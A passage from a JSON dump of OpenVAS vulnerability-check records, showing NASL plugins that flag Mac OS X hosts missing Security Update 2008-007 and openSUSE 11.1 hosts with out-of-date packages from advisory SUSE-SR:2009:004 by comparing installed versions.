Postfix\n PSNormalizer\n QuickLook\n rlogin\n Script Editor\n Single Sign-On\n Tomcat\n vim\n Weblog", "cvss3": {}, "published": "2010-05-12T00:00:00", "type": "openvas", "title": "Mac OS X Security Update 2008-007", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-4214", "CVE-2007-5342", "CVE-2008-3912", "CVE-2008-3646", "CVE-2008-1389", "CVE-2008-4215", "CVE-2008-3914", "CVE-2007-5333", "CVE-2008-2364", "CVE-2008-4212", "CVE-2008-3641", "CVE-2008-1678", "CVE-2008-2371", "CVE-2008-1947", "CVE-2008-3432", "CVE-2008-3643", "CVE-2008-0227", "CVE-2007-5969", "CVE-2008-4101", "CVE-2007-4850", "CVE-2008-2938", "CVE-2007-5461", "CVE-2008-0674", "CVE-2007-2691", "CVE-2008-0226", "CVE-2008-1767", "CVE-2008-2079", "CVE-2007-6286", "CVE-2008-3913", "CVE-2008-2370", "CVE-2008-4211", "CVE-2008-3294", "CVE-2008-3647", "CVE-2008-1232", "CVE-2008-2712", "CVE-2008-3645", "CVE-2007-6420", "CVE-2008-3642", "CVE-2008-0002"], "modified": "2017-02-22T00:00:00", "id": "OPENVAS:102025", "href": "http://plugins.openvas.org/nasl.php?oid=102025", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n#\n# Mac OS X Security Update 2008-007\n#\n# LSS-NVT-2010-014\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\ntag_solution = \"Update your Mac OS X operating system.\n\n For more information see:\n http://support.apple.com/kb/HT3216\";\n\ntag_summary = \"The remote host is missing Security Update 2008-007.\n One or more of the following components are affected:\n\n Apache\n Certificates\n ClamAV\n ColorSync\n CUPS\n Finder\n launchd\n libxslt\n MySQL Server\n Networking\n PHP\n Postfix\n PSNormalizer\n QuickLook\n rlogin\n Script Editor\n Single Sign-On\n Tomcat\n vim\n Weblog\";\n\n\nif(description)\n{\n script_id(102025);\n script_version(\"$Revision: 5394 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-22 10:22:42 +0100 (Wed, 22 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-12 14:48:44 +0200 (Wed, 12 May 2010)\");\n script_cve_id(\"CVE-2007-6420\",\"CVE-2008-1678\",\"CVE-2008-2364\",\"CVE-2008-1389\",\"CVE-2008-3912\",\"CVE-2008-3913\",\"CVE-2008-3914\",\"CVE-2008-3642\",\"CVE-2008-3641\",\"CVE-2008-3643\",\"CVE-2008-1767\",\"CVE-2007-2691\",\"CVE-2007-5969\",\"CVE-2008-0226\",\"CVE-2008-0227\",\"CVE-2008-2079\",\"CVE-2008-3645\",\"CVE-2007-4850\",\"CVE-2008-0674\",\"CVE-2008-2371\",\"CVE-2008-3646\",\"CVE-2008-3647\",\"CVE-2008-4211\",\"CVE-2008-4212\",\"CVE-2008-4214\",\"CVE-2007-6286\",\"CVE-2008-0002\",\"CVE-2008-1232\",\"CVE-2008-1947\",\"CVE-2008-2370\",\"CVE-2008-2938\",\"CVE-2007-5333\",\"CVE-2007-5342\",\"CVE-2007-5461\",\"CVE-2008-2712\",\"CVE-2008-4101\",\"CVE-2008-3432\",\"CVE-2008-3294\",\"CVE-2008-4215\");\n script_name(\"Mac OS X Security Update 2008-007\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_require_ports(\"Services/ssh\", 22);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\",\"ssh/login/osx_version\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\ninclude(\"version_func.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver) exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.5.5\",\"Mac OS X Server 10.5.5\",\"Mac OS X 10.4.11\",\"Mac OS X Server 10.4.11\");\n\nif (rlsnotsupported(rls:ssh_osx_rls, list:pkg_for_ver)) { security_message(0); exit(0);}\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.5\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X 10.5.5\"))) { security_message(0); exit(0);}\n else if ((ssh_osx_ver==osx_ver(ver:\"Mac OS X 10.5.5\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2008.007\"))) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.5\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X Server 10.5.5\"))) { security_message(0); exit(0);}\n else if ((ssh_osx_ver==osx_ver(ver:\"Mac OS X Server 10.5.5\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2008.007\"))) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.4.11\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X 10.4.11\"))) { security_message(0); exit(0);}\n else if ((ssh_osx_ver==osx_ver(ver:\"Mac OS X 10.4.11\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2008.007\"))) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.4.11\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X Server 10.4.11\"))) { security_message(0); exit(0);}\n else if ((ssh_osx_ver==osx_ver(ver:\"Mac OS X Server 10.4.11\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2008.007\"))) { security_message(0); exit(0);}\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:47", "description": "The remote host is missing updates announced in\nadvisory SUSE-SR:2009:004. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.", "cvss3": {}, "published": "2009-02-18T00:00:00", "type": "openvas", "title": "SuSE Security Summary SUSE-SR:2009:004", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-3652", "CVE-2008-5248", "CVE-2007-5342", "CVE-2008-5244", "CVE-2008-5239", "CVE-2008-3231", "CVE-2008-5302", "CVE-2008-5238", "CVE-2008-3796", "CVE-2008-5252", "CVE-2008-5245", "CVE-2009-0416", "CVE-2007-5333", "CVE-2008-3663", "CVE-2008-5240", "CVE-2008-5235", "CVE-2008-5236", "CVE-2008-5250", "CVE-2007-3382", "CVE-2008-5587", "CVE-2008-5086", "CVE-2008-5241", "CVE-2009-0030", "CVE-2007-0184", "CVE-2007-0185", "CVE-2008-5237", "CVE-2008-1947", "CVE-2007-2450", "CVE-2007-2449", "CVE-2008-5658", "CVE-2008-5243", "CVE-2009-0310", "CVE-2007-5613", "CVE-2008-5233", "CVE-2008-5718", "CVE-2007-3386", "CVE-2009-0490", "CVE-2008-5246", "CVE-2008-2938", "CVE-2008-1586", "CVE-2007-5461", "CVE-2009-0313", "CVE-2008-3651", "CVE-2008-5247", "CVE-2007-6286", "CVE-2008-4577", "CVE-2008-2370", "CVE-2008-5242", "CVE-2008-5557", "CVE-2007-2377", "CVE-2007-3385", "CVE-2008-2235", "CVE-2008-1232", "CVE-2008-5234", "CVE-2007-5615", "CVE-2006-3835", "CVE-2008-5256", "CVE-2008-0002"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063412", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063412", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sr_2009_004.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SR:2009:004\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SR:2009:004. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.\";\n\ntag_solution = \"Update all out of date packages.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63412\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-18 23:13:28 +0100 (Wed, 18 Feb 2009)\");\n script_cve_id(\"CVE-2006-3835\", \"CVE-2007-0184\", \"CVE-2007-0185\", \"CVE-2007-2377\", \"CVE-2007-2449\", \"CVE-2007-2450\", \"CVE-2007-3382\", \"CVE-2007-3385\", \"CVE-2007-3386\", \"CVE-2007-5333\", \"CVE-2007-5342\", \"CVE-2007-5461\", \"CVE-2007-5613\", \"CVE-2007-5615\", \"CVE-2007-6286\", \"CVE-2008-0002\", \"CVE-2008-1232\", \"CVE-2008-1586\", \"CVE-2008-1947\", \"CVE-2008-2235\", \"CVE-2008-2370\", \"CVE-2008-2938\", \"CVE-2008-3231\", \"CVE-2008-3651\", \"CVE-2008-3652\", \"CVE-2008-3663\", \"CVE-2008-3796\", \"CVE-2008-4577\", \"CVE-2008-5086\", \"CVE-2008-5233\", \"CVE-2008-5234\", \"CVE-2008-5235\", \"CVE-2008-5236\", \"CVE-2008-5237\", \"CVE-2008-5238\", \"CVE-2008-5239\", \"CVE-2008-5240\", \"CVE-2008-5241\", \"CVE-2008-5242\", \"CVE-2008-5243\", \"CVE-2008-5244\", \"CVE-2008-5245\", \"CVE-2008-5246\", \"CVE-2008-5247\", \"CVE-2008-5248\", \"CVE-2008-5250\", \"CVE-2008-5252\", \"CVE-2008-5256\", \"CVE-2008-5302\", \"CVE-2008-5557\", \"CVE-2008-5587\", \"CVE-2008-5658\", \"CVE-2008-5718\", \"CVE-2009-0030\", \"CVE-2009-0310\", \"CVE-2009-0313\", \"CVE-2009-0416\", \"CVE-2009-0490\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Summary SUSE-SR:2009:004\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~3.0.6~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-branding-upstream\", rpm:\"MozillaFirefox-branding-upstream~3.0.6~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~3.0.6~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aaa_base\", rpm:\"aaa_base~11.1~10007.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apport\", rpm:\"apport~0.114~8.5.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apport-crashdb-opensuse\", rpm:\"apport-crashdb-opensuse~0.114~8.5.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apport-gtk\", rpm:\"apport-gtk~0.114~8.5.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apport-qt\", rpm:\"apport-qt~0.114~8.5.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apport-retrace\", rpm:\"apport-retrace~0.114~8.5.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi\", rpm:\"at-spi~1.24.0~2.6.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-devel\", rpm:\"at-spi-devel~1.24.0~2.6.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-doc\", rpm:\"at-spi-doc~1.24.0~2.6.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-lang\", rpm:\"at-spi-lang~1.24.0~2.6.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audacity\", rpm:\"audacity~1.3.5~49.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~142.19.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~142.19.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~146.9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dice\", rpm:\"dice~0.1.9~1.3.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dice-debug\", rpm:\"dice-debug~0.1.9~1.3.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dice-devel\", rpm:\"dice-devel~0.1.9~1.3.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glade3\", rpm:\"glade3~3.5.2~7.25.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glade3-lang\", rpm:\"glade3-lang~3.5.2~7.25.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-obsolete\", rpm:\"glibc-obsolete~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-packagekit\", rpm:\"gnome-packagekit~0.3.11~2.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-packagekit-lang\", rpm:\"gnome-packagekit-lang~0.3.11~2.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel\", rpm:\"gnome-panel~2.24.1~2.25.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-devel\", rpm:\"gnome-panel-devel~2.24.1~2.25.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-doc\", rpm:\"gnome-panel-doc~2.24.1~2.25.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-extras\", rpm:\"gnome-panel-extras~2.24.1~2.25.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-lang\", rpm:\"gnome-panel-lang~2.24.1~2.25.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2\", rpm:\"gtk2~2.14.4~8.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-branding-upstream\", rpm:\"gtk2-branding-upstream~2.14.4~8.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-devel\", rpm:\"gtk2-devel~2.14.4~8.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-doc\", rpm:\"gtk2-doc~2.14.4~8.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-lang\", rpm:\"gtk2-lang~2.14.4~8.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-src\", rpm:\"java-1_6_0-sun-src~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libQtWebKit-devel\", rpm:\"libQtWebKit-devel~4.4.3~4.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libQtWebKit4\", rpm:\"libQtWebKit4~4.4.3~4.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgladeui-1-8\", rpm:\"libgladeui-1-8~3.5.2~7.25.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgladeui-1_0-devel\", rpm:\"libgladeui-1_0-devel~3.5.2~7.25.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgladeui-1_0-doc\", rpm:\"libgladeui-1_0-doc~3.5.2~7.25.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipulog-devel\", rpm:\"libipulog-devel~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpython2_6-1_0\", rpm:\"libpython2_6-1_0~2.6.0~2.22.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqdialogsolver1\", rpm:\"libqdialogsolver1~1.2.6~1.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqdialogsolver1-devel\", rpm:\"libqdialogsolver1-devel~1.2.6~1.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4\", rpm:\"libqt4~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-devel\", rpm:\"libqt4-devel~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-devel-doc\", rpm:\"libqt4-devel-doc~4.4.3~4.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-qt3support\", rpm:\"libqt4-qt3support~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql\", rpm:\"libqt4-sql~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-mysql\", rpm:\"libqt4-sql-mysql~4.4.3~11.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-postgresql\", rpm:\"libqt4-sql-postgresql~4.4.3~11.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-sqlite\", rpm:\"libqt4-sql-sqlite~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-unixODBC\", rpm:\"libqt4-sql-unixODBC~4.4.3~11.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-x11\", rpm:\"libqt4-x11~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libsatsolver-devel\", rpm:\"libsatsolver-devel~0.13.2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff-devel\", rpm:\"libtiff-devel~3.8.2~133.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff3\", rpm:\"libtiff3~3.8.2~133.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt\", rpm:\"libvirt~0.4.6~11.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-devel\", rpm:\"libvirt-devel~0.4.6~11.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-doc\", rpm:\"libvirt-doc~0.4.6~11.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-python\", rpm:\"libvirt-python~0.4.6~11.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.1~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.1~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-doc\", rpm:\"libxml2-doc~2.7.1~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libzypp\", rpm:\"libzypp~5.25.3~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libzypp-devel\", rpm:\"libzypp-devel~5.25.3~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190\", rpm:\"mozilla-xulrunner190~1.9.0.6~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-devel\", rpm:\"mozilla-xulrunner190-devel~1.9.0.6~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-gnomevfs\", rpm:\"mozilla-xulrunner190-gnomevfs~1.9.0.6~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-translations\", rpm:\"mozilla-xulrunner190-translations~1.9.0.6~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nano\", rpm:\"nano~2.1.7~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk\", rpm:\"netatalk~2.0.3~246.13.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk-devel\", rpm:\"netatalk-devel~2.0.3~246.13.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nfs-client\", rpm:\"nfs-client~1.1.3~18.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nfs-doc\", rpm:\"nfs-doc~1.1.3~18.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nfs-kernel-server\", rpm:\"nfs-kernel-server~1.1.3~18.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.0~168.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-devel\", rpm:\"openslp-devel~1.2.0~168.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-server\", rpm:\"openslp-server~1.2.0~168.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = 